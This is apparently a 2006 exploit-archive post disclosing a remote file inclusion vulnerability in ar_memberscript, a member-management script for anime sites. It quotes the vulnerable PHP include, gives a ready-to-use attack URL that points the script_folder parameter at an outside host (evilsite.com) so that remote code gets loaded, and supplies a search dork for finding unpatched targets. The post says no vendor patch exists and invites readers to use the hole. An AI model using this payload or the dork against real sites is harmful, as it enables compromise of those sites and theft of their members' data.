34 lines
No EOL
1 KiB
Text
34 lines
No EOL
1 KiB
Text
#################################################################################################
|
|
# Author: ex0
|
|
#
|
|
# ar_memberscript - remote file include vulnerability (all versions)
|
|
#
|
|
# **There is no vendo patch, and doubt there will be. I havnt been able to get in touch with the
|
|
# vendor for 2 months**
|
|
#
|
|
# ar_memberscript is a script used by many anime sites to manage their members, news, and some
|
|
# content, in some cases "premium media".
|
|
#
|
|
#
|
|
# Discovered: 10/22/06
|
|
# Published: 12/12/06
|
|
#
|
|
# Enjoy it.
|
|
#
|
|
#################################################################################################
|
|
|
|
Here is the vulnerable code:
|
|
|
|
usercp_menu.php
|
|
include ( "$script_folder/login_form2.php" );
|
|
|
|
www.someanimesite.com/member/usercp_menu.php?script_folder=http://evilsite.com
|
|
|
|
Dont take too much advantage of it :).
|
|
|
|
Dork: "Members Statistics" +"Total Members" +"Guests Online"
|
|
|
|
# Greetz; Caution, Raph13, Yeast, Xpontius and all former Inf Crew members & all XeN Members.
|
|
# IRC: irc.milw0rm.com:6667 #esk
|
|
|
|
# milw0rm.com [2006-12-14] |